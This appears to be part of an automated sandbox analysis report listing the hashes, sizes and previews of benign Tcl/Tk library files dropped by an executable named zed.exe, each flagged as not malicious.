                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                                                                                                                            MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                                                                                                                            SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                                                                                                                            SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                                                                                                                            SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.879221007428352
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                                                                                                                            MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                                                                                                                            SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                                                                                                                            SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                                                                                                                            SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                                                            Entropy (8bit):4.999171213761279
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                                                                                                                            MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                                                                                                                            SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                                                                                                                            SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                                                                                                                            SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6945
                                                                                                                                                                                                                                            Entropy (8bit):3.7806395604065135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                                            MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                                                                                                                            SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                                                                                                                            SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                                                                                                                            SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.8800842076244715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                                                                                                                            MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                                                                                                                            SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                                                                                                                            SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                                                                                                                            SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5030
                                                                                                                                                                                                                                            Entropy (8bit):4.838527643033185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                                                                                                                            MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                                                                                                                            SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                                                                                                                            SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                                                                                                                            SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8806
                                                                                                                                                                                                                                            Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                                            MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                                            SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                                            SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                                            SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21612
                                                                                                                                                                                                                                            Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                                            MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                                            SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                                            SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                                            SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9960
                                                                                                                                                                                                                                            Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                                            MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                                            SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                                            SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                                            SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22103
                                                                                                                                                                                                                                            Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                                            MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                                            SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                                            SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                                            SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8690
                                                                                                                                                                                                                                            Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                                            MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                                            SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                                            SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                                            SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):33347
                                                                                                                                                                                                                                            Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                                            MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                                            SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                                            SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                                            SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5988
                                                                                                                                                                                                                                            Entropy (8bit):4.829498876074983
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:qFR55woFFEciKwKClFEOTIhDHWyzaoj9zza7v0J7:qL55jiKwKCzTIhDbzaojhSG7
                                                                                                                                                                                                                                            MD5:B2B3AA971D42FDBF92F13B45111EE1D3
                                                                                                                                                                                                                                            SHA1:A74F2C2707463D6E209D0E0C96D75083AC6920A5
                                                                                                                                                                                                                                            SHA-256:1C977052C1D8293CC5FE4198A538BECA9BC821AF85E76E4EEFBFB75B33CE8BED
                                                                                                                                                                                                                                            SHA-512:146F658DA3E6E9176FA51C9836D7C1DCFC14E148A26B224155F6493C195A7FB20C2DC4EE21994E5A193B8DA8561C75374E830304F94F0C844E52AD829F6810D5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# dialog.tcl --..#..# This file defines the procedure tk_dialog, which creates a dialog..# box containing a bitmap, a message, and one or more buttons...#..# Copyright (c) 1992-1993 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# ::tk_dialog:..#..# This procedure displays a dialog box, waits for a button in the dialog..# to be invoked, then returns the index of the selected button. If the..# dialog somehow gets destroyed, -1 is returned...#..# Arguments:..# w -..Window to use for dialog top-level...# title -.Title to display in dialog's decorative frame...# text -.Message to display in dialog...# bitmap -.Bitmap to display in dialog (empty string means none)...# default -.Index of button that is to display the default ring..#..(-1 means none)...# args -.One or more strings to display in buttons
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18440
                                                                                                                                                                                                                                            Entropy (8bit):4.982597499983157
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:mDfyPIlBk3yrt8qLjtpa+qh+rA4rsWRWrrMUtCPnkKYNlPp64ZnCD:mDfyPIlBk3yJ8mtpaplcp6o
                                                                                                                                                                                                                                            MD5:007F42FBCDC57652AC8381F11AF7FB67
                                                                                                                                                                                                                                            SHA1:1BB1B0FCAD6F5633D1BEB8903112F180B1C4BA7F
                                                                                                                                                                                                                                            SHA-256:65BA33A1E0B21E8E074780A51189CEE6FD9926C85273E9E7633987FC212A17B2
                                                                                                                                                                                                                                            SHA-512:A27089719ADAFC48B5ABB905E40D0C6A0A2507526223D72C1CFF36AB7C15362C6F0B8EE5775181BA1730852802AFA64631EE3720E624B630E3274BFB32F6A59A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# entry.tcl --..#..# This file defines the default bindings for Tk entry widgets and provides..# procedures that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#...start dragging out a selection)...# pressX -..X-coordinate at which the mouse button was pressed...# selectMode -..The style of selection currently underway:..#...char, word
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5035
                                                                                                                                                                                                                                            Entropy (8bit):4.819523401259934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:J3MRZZ7HWb/6OgRKjtS6Mn9GRZZ7HWb2Y6aO6R5nh76SMoB2kd82KtTpsi2D0DSn:CRZdPul1RZdFaRf0XoB2gZKZpsi2pn
                                                                                                                                                                                                                                            MD5:63B219BE9AFF1DE7DE2BAF0E941CAE38
                                                                                                                                                                                                                                            SHA1:A2FEBB31380E12FF01E6F641FE8B4F815941462F
                                                                                                                                                                                                                                            SHA-256:8872F236D7E824AEC0ACD4BACC00FDD7EC9BC5534814ECF2160610C10647B7C5
                                                                                                                                                                                                                                            SHA-512:057700F8FDE4B7C3D7AB7CEFD6C531060BF2B1B3B727CAD6A37ECD42EBC557765D94B83ADD438BD5AFA1F6F919D80AE755A8D98918981167B871F31AD42FDF5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# focus.tcl --..#..# This file defines several procedures for managing the input..# focus...#..# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_focusNext --..# This procedure returns the name of the next window after "w" in..# "focus order" (the window that should receive the focus next if..# Tab is typed in w). "Next" is defined by a pre-order search..# of a top-level and its non-top-level descendants, with the stacking..# order determining the order of siblings. The "-takefocus" options..# on windows determine whether or not they should be skipped...#..# Arguments:..# w -..Name of a window.....proc ::tk_focusNext w {.. set cur $w.. while {1} {.....# Descend to just before the first child of the current widget......set parent $cur...set children [winfo children $cur]...set i -1.....# Look for the next sibling that isn't a top-leve
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18232
                                                                                                                                                                                                                                            Entropy (8bit):4.723225284452692
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:NoRqdguMCeor/4VxgU80zNxWHKVozN5EaKdhsbyM:NoRqdguMCeor/4VxgUnzN0KSDEk
                                                                                                                                                                                                                                            MD5:CFA99C2D3F02AE6538809774699A9CE7
                                                                                                                                                                                                                                            SHA1:DADB7B3D1D9531710BA7D3025CE18F6F8149F280
                                                                                                                                                                                                                                            SHA-256:4EE521F4980A5056077005B748717D91CB6B17342CDD20135962AB92A665B580
                                                                                                                                                                                                                                            SHA-512:DCF54AAEA439C986AE28CEC0241F204BB5001DE4E98C2E7A9C282F9E47747AD62E9B2CF6FBBAC068BF1F1BB0AAC866F85476E9EE79935CE1E3656F122C2D002D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# fontchooser.tcl -..#..#.A themeable Tk font selection dialog. See TIP #324...#..# Copyright (C) 2008 Keith Vetter..# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::fontchooser {.. variable S.... set S(W) .__tk__fontchooser.. set S(fonts) [lsort -dictionary -unique [font families]].. set S(styles) [list \.. [::msgcat::mc Regular] \.. [::msgcat::mc Italic] \.. [::msgcat::mc Bold] \.. [::msgcat::mc {Bold Italic}] \.. ].. set S(sizes) {8 9 10 11 12 14 16 18 20 22 24 26 28 36 48 72}.. set S(strike) 0.. set S(under) 0.. set S(first) 1.. set S(-parent) ... set S(-title) {}.. set S(-command) "".. set S(-font) TkDefaultFont.. set S(bad) [list ]..}....proc ::tk::fontchooser::Canonical {} {.. variable S.... foreach style $S(styles
